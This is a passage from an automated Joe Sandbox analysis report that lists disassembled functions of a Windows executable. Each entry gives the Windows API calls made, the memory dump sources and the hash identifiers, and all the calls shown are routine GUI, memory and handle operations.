                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleep$RectWindow
                                                      • String ID:
                                                      • API String ID: 3382505437-0
                                                      • Opcode ID: 533f2d1b556be7061dfe7b6aa8462b87f30221ed49fda914e772afd691a739ab
                                                      • Instruction ID: 1b7ad89f5c07c91f55d284fa6c818b1927526a98b3a56a68e723b75b3654349d
                                                      • Opcode Fuzzy Hash: 533f2d1b556be7061dfe7b6aa8462b87f30221ed49fda914e772afd691a739ab
                                                      • Instruction Fuzzy Hash: 3A31DF71A0021AEFCF00CFA8CD98ADE3BB5EB44318F105269F925B72D0C3709944CB91
                                                      Function 00EC5706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00EC5745
                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00EC579D
                                                      • _wcslen.LIBCMT ref: 00EC57AF
                                                      • _wcslen.LIBCMT ref: 00EC57BA
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EC5816
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$_wcslen
                                                      • String ID:
                                                      • API String ID: 763830540-0
                                                      • Opcode ID: 48f842a36773e3239a30ceafc76634794a7c64f905f3b8f0673f7796637d695f
                                                      • Instruction ID: ab2fffa3a8a20bc8681982c3ecb409b7d4d56f14348a31503b10587e63f94a95
                                                      • Opcode Fuzzy Hash: 48f842a36773e3239a30ceafc76634794a7c64f905f3b8f0673f7796637d695f
                                                      • Instruction Fuzzy Hash: A4218172904618DADB208F60CD85FEE77B8FF44724F10925AF929BA180D771A9C6CF51
                                                      Function 00EB0930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsWindow.USER32(00000000), ref: 00EB0951
                                                      • GetForegroundWindow.USER32 ref: 00EB0968
                                                      • GetDC.USER32(00000000), ref: 00EB09A4
                                                      • GetPixel.GDI32(00000000,?,00000003), ref: 00EB09B0
                                                      • ReleaseDC.USER32(00000000,00000003), ref: 00EB09E8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$ForegroundPixelRelease
                                                      • String ID:
                                                      • API String ID: 4156661090-0
                                                      • Opcode ID: c633499292efdc52f6074809cf3627eb75e5df315a31c9f9eb136a141bad6491
                                                      • Instruction ID: aa9bbb73be0c70f1faf03835e2d794a13853ef15ba2727664aaa5483d6b92991
                                                      • Opcode Fuzzy Hash: c633499292efdc52f6074809cf3627eb75e5df315a31c9f9eb136a141bad6491
                                                      • Instruction Fuzzy Hash: CE216F35600204AFD704EF65C988EAFBBE9EF89740F149079E84AB7752CB30AC05CB90
                                                      Function 00E6CDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32 ref: 00E6CDC6
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E6CDE9
                                                        • Part of subcall function 00E63820: RtlAllocateHeap.NTDLL(00000000,?,00F01444,?,00E4FDF5,?,?,00E3A976,00000010,00F01440,00E313FC,?,00E313C6,?,00E31129), ref: 00E63852
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00E6CE0F
                                                      • _free.LIBCMT ref: 00E6CE22
                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E6CE31
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                      • String ID:
                                                      • API String ID: 336800556-0
                                                      • Opcode ID: 70b5d50826eedb4d7c6afe0b17895260fdacbb078a184c7d73e8f1f657e9d0f4
                                                      • Instruction ID: 537d7a2408668f765f30653b4ac10cf553174111e1907340c0b434ae0dca6260
                                                      • Opcode Fuzzy Hash: 70b5d50826eedb4d7c6afe0b17895260fdacbb078a184c7d73e8f1f657e9d0f4
                                                      • Instruction Fuzzy Hash: D401D472A422157F232116BB7C8CC7B7A7DDFC6BE53351129F909F7200EA668D0281B0
                                                      Function 00E49639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E49693
                                                      • SelectObject.GDI32(?,00000000), ref: 00E496A2
                                                      • BeginPath.GDI32(?), ref: 00E496B9
                                                      • SelectObject.GDI32(?,00000000), ref: 00E496E2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ObjectSelect$BeginCreatePath
                                                      • String ID:
                                                      • API String ID: 3225163088-0
                                                      • Opcode ID: 07bae1241627723048c0edca0718d018ef190bde9d92199ed93d88e6477e153d
                                                      • Instruction ID: dbd0dd7fc30f65ace4cc592a9737ed60767821a2878bb59aaffea028c4603b61
                                                      • Opcode Fuzzy Hash: 07bae1241627723048c0edca0718d018ef190bde9d92199ed93d88e6477e153d
                                                      • Instruction Fuzzy Hash: 5821A730802309EFDB119F25FC08BAA3BB4BB50359F210256F418B61B1D3719856DF90
                                                      Function 00E4990E Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 00E498CC
                                                      • SetTextColor.GDI32(?,?), ref: 00E498D6
                                                      • SetBkMode.GDI32(?,00000001), ref: 00E498E9
                                                      • GetStockObject.GDI32(00000005), ref: 00E498F1
                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00E49952
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Color$LongModeObjectStockTextWindow
                                                      • String ID:
                                                      • API String ID: 1860813098-0
                                                      • Opcode ID: 6d14e69f22affd0d4c3ac4242c487b6e172310605592808dd71a88a06b1bd912
                                                      • Instruction ID: 748b88403f6df9f303209ee04e9c6f49ecb1e9ea2fc0161ea14cd2a78687a1f5
                                                      • Opcode Fuzzy Hash: 6d14e69f22affd0d4c3ac4242c487b6e172310605592808dd71a88a06b1bd912
                                                      • Instruction Fuzzy Hash: CA213A325462109FCB258F26FC54EEB3B60AB96335B28025DF6A67A1E3C7324851DB50
                                                      Function 00E95711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: 1c91e65a3ddbb861a06882d5c30f57a6b73801ed7878bfeed1f1070a0a924ec0
                                                      • Instruction ID: 6ab34ca8aebf130d605c50c2779fca3ad96fe302cc8277a345fa0988e4eaf781
                                                      • Opcode Fuzzy Hash: 1c91e65a3ddbb861a06882d5c30f57a6b73801ed7878bfeed1f1070a0a924ec0
                                                      • Instruction Fuzzy Hash: 8701F563741709FBDA095650AE92FFB739D9B20399F006026FD04BA241F731EF2583A0
                                                      Function 00E62DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,00E5F2DE,00E63863,00F01444,?,00E4FDF5,?,?,00E3A976,00000010,00F01440,00E313FC,?,00E313C6), ref: 00E62DFD
                                                      • _free.LIBCMT ref: 00E62E32
                                                      • _free.LIBCMT ref: 00E62E59
                                                      • SetLastError.KERNEL32(00000000,00E31129), ref: 00E62E66
                                                      • SetLastError.KERNEL32(00000000,00E31129), ref: 00E62E6F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free
                                                      • String ID:
                                                      • API String ID: 3170660625-0
                                                      • Opcode ID: ce5e8896d03948d8da19d60bde5ff6578669dd39ab5b7fb933d163fcb9646184
                                                      • Instruction ID: 8e5efc4bfbed4e31cec7488a35ca5fb068cd016193740031b812cfa2d605915f
                                                      • Opcode Fuzzy Hash: ce5e8896d03948d8da19d60bde5ff6578669dd39ab5b7fb933d163fcb9646184
                                                      • Instruction Fuzzy Hash: B201F4366C5E006BC71327397C49D6B26ADABD13E9B35603CF629B22D2EF228C065120
                                                      Function 00E9000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E8FF41,80070057,?,?,?,00E9035E), ref: 00E9002B
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E8FF41,80070057,?,?), ref: 00E90046
                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E8FF41,80070057,?,?), ref: 00E90054
                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E8FF41,80070057,?), ref: 00E90064
                                                      • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E8FF41,80070057,?,?), ref: 00E90070
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                      • String ID:
                                                      • API String ID: 3897988419-0
                                                      • Opcode ID: aba1204bfcee3453447031fcb2d87dd2b7f5e4be21eb03d1e03f3ab76ca8a245
                                                      • Instruction ID: 114046b4ef585fce7d4c5cbfc6642a0d3e3f62a25c4d1ad16f12831fb5369cde
                                                      • Opcode Fuzzy Hash: aba1204bfcee3453447031fcb2d87dd2b7f5e4be21eb03d1e03f3ab76ca8a245
                                                      • Instruction Fuzzy Hash: 61017872600204AFDB158F6ADC04FAA7AADEB44792F645524F909E2210E772ED459BA0
                                                      Function 00E9E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00E9E997
                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 00E9E9A5
                                                      • Sleep.KERNEL32(00000000), ref: 00E9E9AD
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00E9E9B7
                                                      • Sleep.KERNEL32 ref: 00E9E9F3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                      • String ID:
                                                      • API String ID: 2833360925-0
                                                      • Opcode ID: a61d8b740700840114de7cf20cfc53e283d831cb95ce22fe034becf5a4da51dd
                                                      • Instruction ID: 1583b9fc404f42b5e7343243e6ba45e43e33f13e1b47ecd05a1efcb553cb0101
                                                      • Opcode Fuzzy Hash: a61d8b740700840114de7cf20cfc53e283d831cb95ce22fe034becf5a4da51dd
                                                      • Instruction Fuzzy Hash: F5015B31C01529DBCF04DBE6DC59ADDBB78FB48300F150596E602B2241CB31999587A1
                                                      Function 00E910F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E91114
                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,00E90B9B,?,?,?), ref: 00E91120
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E90B9B,?,?,?), ref: 00E9112F
                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E90B9B,?,?,?), ref: 00E91136
                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E9114D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 842720411-0
                                                      • Opcode ID: 25627c7cd4f8a8c9dd1ad2b581fcecaad3b8558c7acf0721fb74bbffaac5f950
                                                      • Instruction ID: 15d752ee7a7b8cf5055a0a8427b85e9ed501386d6b7cd2796bf26362dd30da5b
                                                      • Opcode Fuzzy Hash: 25627c7cd4f8a8c9dd1ad2b581fcecaad3b8558c7acf0721fb74bbffaac5f950
                                                      • Instruction Fuzzy Hash: F8016D75101205BFDB114F66DC4DE6A3B6EEF85364B240465FA45E3350DB32DC428A60
                                                      Function 00E90FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E90FCA
                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E90FD6
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E90FE5
                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E90FEC
                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E91002
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: ebf56306e67905721eca0018327b6c17e248e7151ece9e87494995ea3cdbf28b
                                                      • Instruction ID: c3902daf6119ad49f5c7e320ea68489474d68c9f409702a92edd97f3c332c1c5
                                                      • Opcode Fuzzy Hash: ebf56306e67905721eca0018327b6c17e248e7151ece9e87494995ea3cdbf28b
                                                      • Instruction Fuzzy Hash: ABF0AF75100301AFDB210FA69C49F5A3B6EFF89761F200464F909E6250CA32DC42CA60
                                                      Function 00E91014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E9102A
                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E91036
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E91045
                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E9104C
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E91062
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: cbc7f8a314896fb289e0d1e95fa8072e9c62d62e5bcc7945229585b20ca70740
                                                      • Instruction ID: e70ec399f3def2993c5113cf7768b0822aa79d59ad78bb9fed0e8aa5b6222875
                                                      • Opcode Fuzzy Hash: cbc7f8a314896fb289e0d1e95fa8072e9c62d62e5bcc7945229585b20ca70740
                                                      • Instruction Fuzzy Hash: EFF06235101301EFDB215FA6EC49F5A3B6DFF897A1F240464F949E7250CA72D8469A60
                                                      Function 00EA030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CloseHandle.KERNEL32(?,?,?,?,00EA017D,?,00EA32FC,?,00000001,00E72592,?), ref: 00EA0324
                                                      • CloseHandle.KERNEL32(?,?,?,?,00EA017D,?,00EA32FC,?,00000001,00E72592,?), ref: 00EA0331
                                                      • CloseHandle.KERNEL32(?,?,?,?,00EA017D,?,00EA32FC,?,00000001,00E72592,?), ref: 00EA033E
                                                      • CloseHandle.KERNEL32(?,?,?,?,00EA017D,?,00EA32FC,?,00000001,00E72592,?), ref: 00EA034B
                                                      • CloseHandle.KERNEL32(?,?,?,?,00EA017D,?,00EA32FC,?,00000001,00E72592,?), ref: 00EA0358
                                                      • CloseHandle.KERNEL32(?,?,?,?,00EA017D,?,00EA32FC,?,00000001,00E72592,?), ref: 00EA0365
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID:
                                                      • API String ID: 2962429428-0
                                                      • Opcode ID: 4b77a68d64ac78f5f62208f0fa7f67c3ca232e8b3caeda85c0a02f203e51178e
                                                      • Instruction ID: eb74bc9ab5e8cb81b2c4148ea0a1f634b45a30394d11d9bdf71f3ba963e26824
                                                      • Opcode Fuzzy Hash: 4b77a68d64ac78f5f62208f0fa7f67c3ca232e8b3caeda85c0a02f203e51178e
                                                      • Instruction Fuzzy Hash: 4F01AE72800B159FCB30AF66D880816FBF9BF653193159A3FD19662931C3B1B959DF80
                                                      Function 00E6D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00E6D752
                                                        • Part of subcall function 00E629C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000), ref: 00E629DE
                                                        • Part of subcall function 00E629C8: GetLastError.KERNEL32(00000000,?,00E6D7D1,00000000,00000000,00000000,00000000,?,00E6D7F8,00000000,00000007,00000000,?,00E6DBF5,00000000,00000000), ref: 00E629F0
                                                      • _free.LIBCMT ref: 00E6D764
                                                      • _free.LIBCMT ref: 00E6D776
                                                      • _free.LIBCMT ref: 00E6D788
                                                      • _free.LIBCMT ref: 00E6D79A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: ca3b576429f81882497ccbe2f1319291440a60747d83cd146f4c063f131b6db1
                                                      • Instruction ID: a358e3a7550931b8a9d2fff74dc0d0cf0842b4a1fa0a93fa1f9568e4a7abf175
                                                      • Opcode Fuzzy Hash: ca3b576429f81882497ccbe2f1319291440a60747d83cd146f4c063f131b6db1
                                                      • Instruction Fuzzy Hash: 6DF0E132A846486B8619EB55F9C5C5677DDBBC47D47F4280AF144F7501C720FC44C665
                                                      Function 00E95C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00E95C58
